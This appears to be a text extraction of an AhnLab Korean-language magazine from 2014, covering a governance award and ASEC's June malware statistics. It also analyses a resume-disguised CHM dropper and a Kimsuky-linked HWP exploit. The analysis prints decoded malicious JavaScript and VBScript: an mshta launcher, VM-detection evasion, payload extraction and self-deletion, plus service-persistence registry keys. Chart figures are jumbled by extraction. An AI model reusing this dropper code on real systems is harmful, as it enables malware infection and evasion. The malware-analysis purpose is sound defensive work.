지배구조우수기업 은한국기업지배구조원이매년모든상장법인을대상으로기업의지배구조와사회책임경영, 환경경영등지속가능경영능력을종합적으로평가해선정한다. 안랩은 2008년첫수상이래올해까지 6회째수상했다. 지배구조안랩은 2005년에 CEO와이사회의역할을분리해견제와균형이가능한지배구조를갖췄다. 2007년에는국내벤처기업중에서이례적으로사외이사비율을 50% 로확대한데이어감사위원회를설치했다. 사외이사제도와감사위원회설치는투명하고선진적인지배구조경영의핵심적인요소로, 안랩은선진화된지배구조를만들어가고있다. 사회책임경영안랩은창립이래사회적역할에충실하고자최선의노력을다하고있다. 개인용백신 V3 Lite를무료로배포하고, 디도스공격등국가적사이버재난시솔선수범해위기를돌파해왔다. 국내최고의 IT 꿈나무육성프로그램인 V스쿨 을꾸준히개최하고, 전국대학의정보보호학과, 컴퓨터공학과에정규과목강의등적극적인지식기부로미래보안전문가를양성하는데기여하고있다. 또한안랩은지역기반기업사회공헌연합 판교CSR얼라이언스 회원사로참여해지역내중 고 대학생등연령별맞춤강연회와유용한 IT 정보확산을위한 IT UCC 콘테스트 를진행하고있으며, 판교테크노밸리일대육교를쾌적하게관리하는환경미화활동 1사 ( 社 ) 1교 ( 橋 ), 그리고회원사임직원들이직접기부한물건을아름다운가게를통해판매하고수익금을사회에환원하는활동등을통해지역사회의다양한문제해결에도앞장서고있다. 환경경영아울러안랩은환경적으로건전하고지속가능한발전을도모하고있다. 판교사옥을친환경업무환경으로조성한한편, IT 기반에너지관리솔루션운용등으로에너지절감을적극실천하고있다. 안랩권치중대표는 안랩은국내대표통합보안기업으로서매출등양적인측면뿐만아니라연구개발 (R&D), 회계투명성, 지배구조, 사회공헌 (CSR), 복리후생, 환경경영등질적인측면도함께발전시키고자부단히노력해왔다 며, 이번지배구조우수기업수상이우리사회에더의미있는성과를만들어달라는뜻이담겨있다고생각하고, 바람직한기업의역할을충실히해나가겠다 라고밝혔다. 한편, 안랩은모범적인투명경영을인정받아지난해한국회계학회로부터 투명회계대상 을받은바있으며, 제 11회경제정의기업상 ( 경실련, 공정거래위, 2002년 ), 제 1회한국윤리경영대상 -투명경영부문대상 ( 신산업경영원, 산업자원부, 2003년 ), 제 1회경영정보대상 -투명경영부문대상 ( 한국회계정보학회, 2003) 등을수상하기도했다. 25
Statistics 보안통계와이슈 ASEC, 6 월악성코드통계및보안이슈발표 문서파일로위장한악성코드와타깃공격주의 안랩시큐리티대응센터 (ASEC) 는 ASEC Report Vol.54 를통해지난 2014 년 6 월의보안통계및이슈를전했다. 6 월의주요보안이 슈를살펴본다. 6월, 전월주춤했던 PUP 다시강세 ASEC이집계한바에따르면, 2014년 6월한달간탐지된악성코드수는 170만 5,345건으로나타났다. 이는전월 171만 87건에비해 4,742건감소한수치다. 한편 6월에수집된악성코드샘플수는 261 만 1,553건으로집계됐다. [ 그림 2] 는 2014년 6월한달간유포된악성코드를주요유형별로집계한결과이다. 불필요한프로그램인 PUP(Potentially Unwanted Program) 가 40.94% 로가장높은비중을차지했고, 트로이목마 (Trojan) 류의악성코드가 33.28%, 애드웨어 (Adware) 가 8.27% 로그뒤를이었다. [ 그림 1] 에서 탐지건수 란고객이사용중인 V3 등안랩의제품이탐 지한악성코드의수를의미하며, 샘플수집수 는안랩이자체적으로수집한전체악성코드샘플수를의미한다. 8.27% 40.94% 5,000,000 17.51% 33.28% 4,000,000 3,000,000 2,000,000 1,000,000 0 4월 [ 그림 1] 악성코드추이 2,884,767 2,717,050 2,697,234 1,710,087 5월탐지건수 2,611,553 1,705,345 6월샘플수집수 PUP Trojan etc Adware [ 그림 2] 주요악성코드유형 2014년 6월에악성코드유포지로악용된도메인은 1,406개, URL은 1만 218개로집계됐다 ([ 그림 3]). 또한 6월의악성도메인및 URL 차단건수는총 214만 7,161건이다 ([ 그림 4]). 악성도메인및 URL 차단건수는 PC 등시스템이악성코드유포지로악용된웹사이트에접속하는것을차단한수이다. 26
5,000,000 4,000,000 4,567,453 CHM 파일을클릭하면 [ 그림 5] 와같이이력서형식의 Main.html 파일을실행한다. 이때해당 html 파일에첨부되어있는악성자바스크립트가실행된다 ([ 그림 6]). 3,000,000 2,000,000 1,776,498 2,147,161 1,000,000 50,000 40,000 30,000 [ 그림 5] 이력서로위장한 CHM 악성파일 20,000 19,644 10,000 3,186 1,257 7,575 1,406 10,218 0 4 월 5 월 6 월 악성도메인 /URL 차단건수 악성코드유포도메인수 악성코드유포 URL 수 [ 그림 3] 악성코드유포도메인 / URL 탐지및차단건수 2014년 6월한달간탐지된모바일악성코드는 26만 3,993건으로 나타났다. 263,993 250,000 200,000 150,000 100,000 80,461 75,853 50,000 0 4월 5월 6월 [ 그림 4] 모바일악성코드추이이력서로위장한 CHM 악성파일이력서로위장한 CHM 파일이발견돼주의가요구된다. CHM 파일에는 [ 표 1] 과같이여러종류의파일들이포함되어있다. [ 그림 6] Main.html 에첨부되어있는자바스크립트 해당스크립트를복호화하면 [ 표 2] 와같이 echo 명령어를통해 %temp%\s.vbs 를생성하고파일을실행한다. <object id='writevbs0' type='application/x-oleobject' classid='clsid:adb880a6- d8ff-11cf-9377-00aa003b7a11' STYLE='display:none' codebase='hhctrl. ocx#version=4,74,8793,0'> <param name='command' value='shortcut'> <param name='item1' value=',mshta,vbscript:createobject("wscript.shell"). run("cmd /c echo On Error Resume Next:Set w=getobject(""winmgmts:\\.\root\ cimv2""):set q=w.execquery(""select * from win32_process""):for Each p In q:if InStr(p.CommandLine,"".chm"")>0 Then:url=""ms-its:""+Trim(Replace(Replace(p. CommandLine,p.executablepath,""""),Chr(34),""""))+""::/1.htm"":End If:Next:Set M=CreateObject(""CDO.Message""):m.CreateMHTMLBody url,31:execute(m. HTMLBody)>%temp%\s.vbs",0)(window.close)'> </object> <object id='download' type='application/x-oleobject' classid='clsid:adb880a6- d8ff-11cf-9377-00aa003b7a11' STYLE='display:none' codebase='hhctrl. ocx#version=4,74,8793,0'> Download.HHClick() [ 표 2] 복호화된자바스크립트 생성된 vbs는프로세스목록에서 chm 파일을찾아다운로드하는 1.htm 을실행한다. 1.htm 은난독화되어있는데이를풀면다음과같이소스코드를확인할수있다. /Main.html - 이력서파일 + vbs 생성하는자바스크립트 ( 패킹 ) /1.htm - 가상머신체크후 xml.htm 을불러와악성파일을생성하는 vbs /mypic.jpg - 이력서사진 /Resume_screen.css - 이력서 css /xml.htm - base64 encoding 된악성파일 [ 표 1] CHM에포함되어있는파일들 fp=s.expandenvironmentstrings("%temp%")&"\"&outfile Set w = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\ cimv2") set pa=w.execquery("select * from win32_process") For Each p In pa If LCase(p.caption) = LCase("vmtoolsd.exe") Then delself() 27
wsh.quit End If If InStr(LCase(p.CommandLine),LCase(".chm"))>0 Then url="ms-its:"&trim(replace(replace(p.commandline,p.executablepath,""),c hr(34),""))&"::/xml.htm"... 중략... End With s.run fp,0 delself() Sub delself() CreateObject("Scripting.FileSystemObject").DeleteFile(wscript.scriptfullname) End Sub [ 그림 8] 과같이한글문서를실행하면 06성우회연락처 라는제목으로이름, 메일주소, 휴대전화번호목록을확인할수있다. [ 표 3] 복호화된 1.html vbs 소스 [ 표 3] 의소스에서현재실행중인프로세스목록중에 vmtoolsd. exe 가있으면종료코드가존재한다. 이는가상환경에서의분석을방해하기위한것이다. 이후 xml.htm 에서파일스트링을읽어와저장후실행한다. [ 그림 8] 한글문서 (HWP) 내용 주요생성파일은다음과같다. [ 파일생성 ] %TEMP%\en.dll %SYSTEMROOT%\Media\en.dll 그리고시스템재시작시에도실행될수있도록다음과같이서비스에등록한다. [ 그림 7] xml.htm 에 base64 로인코딩되어있는악성코드 [HKLM\SYSTEM\ControlSet001\Services\VDM] DisplayName ="Virtual Disk Manager" ObjectName ="LocalSystem" [HKLM\SYSTEM\ControlSet001\Services\VDM\Parameters] ServiceDll ="C:\WINDOWS\Media\en.dll" 생성된악성코드는 IE(Internet Explorer) 를방화벽에예외처리한후 특정 IP 에비정상적으로 http 에접속하는동작을수행한다. 이러한공격을예방하기위해서는요구하지않은이력서나의심스러운확장자의파일은열지말아야한다. V3 제품에서는관련악성코드를다음과같이진단하고있다. <V3 제품군의진단명 > CHM/Exploit (2014.06.14.00) Trojan/Win32.PlugX (2014.06.18.05) [ 그림 9] 서비스등록확인 [ 그림 10] 과같이파일내부에는몇가지기능을짐작할수있는스트링정보가확인된다. 이정보는상위에링크된 ASEC 블로그의 kimsuky 악성코드분석정보의일부내용과도유사하다. 특정인을대상으로유포된한글문서특정인을대상으로유포된것으로보이는의심스러운한글문서 (HWP) 가확인되었다. 정확한유포경로와형태는확인되지않았지만이메일을통해유포되었다. 취약점이있는한글문서는 성우회연락처.hwp 라는파일명으로성우회 ( 예비역장성모임 ) 와관련된수신인을대상으로유포된것으로보인다. 이파일의일부기능은 kimsuky 악성코드와유사하며관련변종으로확인되었다. Kimsuky 악성코드에대한자세한분석정보는아래의링크를통해확인할수있다. The Kimsuky Operation으로명명된한국을대상으로한 APT 공격 (2013/09/12) http://asec.ahnlab.com/968 APT 공격 - 새로운 Kimsuky 악성코드등장 (2014/03/19) http://asec.ahnlab.com/993 [ 그림 10] UAC(User Account Control) 우회 [ 그림 11] 백신및윈도방화벽무력화시도 또한특정메일계정정보 (jack84932@india.com) 를이용한것이확인되었다. 이는수집된정보를유출할때사용한것으로보인다. 해당 HWP 파일에의한악성코드감염은한글 2007 버전에서확인되었으며한글 2010 버전에서는감염이이루어지지않았다. V3 제품에서는관련악성코드를다음과같이진단하고있다. <V3 제품군의진단명 > HWP/Exploit (2014.06.25.01) Trojan/Win32.Kimsuky (2014.06.25.01) 28
발행인 : 권치중발행처 : 주식회사안랩경기도성남시분당구판교역로 220 T. 031-722-8000 F. 031-722-8901 편집인 : 안랩콘텐츠기획팀디자인 : 안랩 UX디자인팀 2014 AhnLab, Inc. All rights reserved. 본간행물의어떤부분도안랩의서면동의없이복제, 복사, 검색시스템으로저장또는전송될수없습니다. 안랩, 안랩로고는안랩의등록상표입니다. 그외다른제품또는회사이름은해당소유자의상표또는등록상표일수있습니다. 본문서에수록된정보는고지없이변경될수있습니다. 29
http://www.ahnlab.com http://blog.ahnlab.com http://twitter.com/ahnlab_man 경기도성남시분당구판교역로 220 T. 031-722-8000 F. 031-722-8901 2014 AhnLab, Inc. All rights reserved.